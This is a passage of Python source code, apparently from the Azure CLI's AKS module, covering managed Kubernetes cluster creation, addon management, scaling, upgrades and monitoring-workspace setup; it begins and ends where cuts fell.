raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
api_server_access_profile=api_server_access_profile
)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name, parameters=mc)
# add cluster spn with Monitoring Metrics Publisher role assignment to the cluster resource
            # MDM metrics are supported only in the Azure public cloud, so add the role assignment only in this cloud
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud' and monitoring:
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_profile.client_id, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for monitoring addon. '
'Are you an Owner on this subscription?')
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
cloud_name = cmd.cli_ctx.cloud.name
    # MDM metrics are supported only in the Azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_client_id, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
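# ADDONS maps the user-facing addon names accepted by --enable-addons / "az aks enable-addons -a"
# to the addon-profile keys stored on the managed cluster, e.g.:
#
#   ADDONS['monitoring']    # -> 'omsagent'
#   ADDONS['virtual-node']  # -> 'aciConnector' (the OS type is appended later, e.g. 'aciConnectorLinux')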
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
        raise CLIError('usage error: --reset-service-principal | --reset-aad')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name, or use the "az aks nodepool" command to scale a node pool.')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = load_balancer_managed_outbound_ip_count is not None or \
load_balancer_outbound_ips is not None or load_balancer_outbound_ip_prefixes is not None
if (update_autoscaler != 1 and not update_lb_profile and
not attach_acr and
not detach_acr and
api_server_authorized_ip_ranges is None):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler", '
                       '"--disable-cluster-autoscaler", '
                       '"--update-cluster-autoscaler", '
                       '"--load-balancer-managed-outbound-ip-count", '
                       '"--load-balancer-outbound-ips", '
                       '"--load-balancer-outbound-ip-prefixes", '
                       '"--attach-acr", "--detach-acr" or '
                       '"--api-server-authorized-ip-ranges".')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
                       'to update auto-scaler settings per node pool.')
node_count = instance.agent_pool_profiles[0].count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
                           'Run "az aks update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
if load_balancer_profile:
instance.network_profile.load_balancer_profile = load_balancer_profile
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
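# The autoscaler switches are summed as booleans, so the guard above expects exactly one of them
# unless another update option is supplied. Sketch of valid invocations (resource names hypothetical):
#
#   aks_update(cmd, client, 'myRG', 'myAKS',
#              enable_cluster_autoscaler=True, min_count=1, max_count=5)
#   aks_update(cmd, client, 'myRG', 'myAKS',
#              api_server_authorized_ip_ranges='')   # empty string clears the IP whitelist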
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, **kwargs):
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience.
:type space_name: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {}" '
                                   'before enabling it again.'.format(resource_group_name))
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
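# Sketch of the result for "--enable-addons monitoring,kube-dashboard" (workspace id illustrative):
#
#   profiles = _handle_addons_args(cmd, 'monitoring,kube-dashboard', subscription_id,
#                                  'myRG', {}, workspace_resource_id='/subscriptions/sub-id/...')
#   # profiles['kubeDashboard']  -> ManagedClusterAddonProfile(enabled=True)
#   # profiles['omsagent']       -> ManagedClusterAddonProfile(enabled=True,
#   #                                   config={'logAnalyticsWorkspaceResourceID': ...})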
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # noqa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
    # currently Log Analytics is supported only in the China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
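# For example, for a resource group located in 'westus2' on the public cloud this resolves to
# (and creates, if needed) a workspace named 'DefaultWorkspace-<subscription_id>-WUS2' in the
# resource group 'DefaultResourceGroup-WUS2', itself placed in 'westus2'.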
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
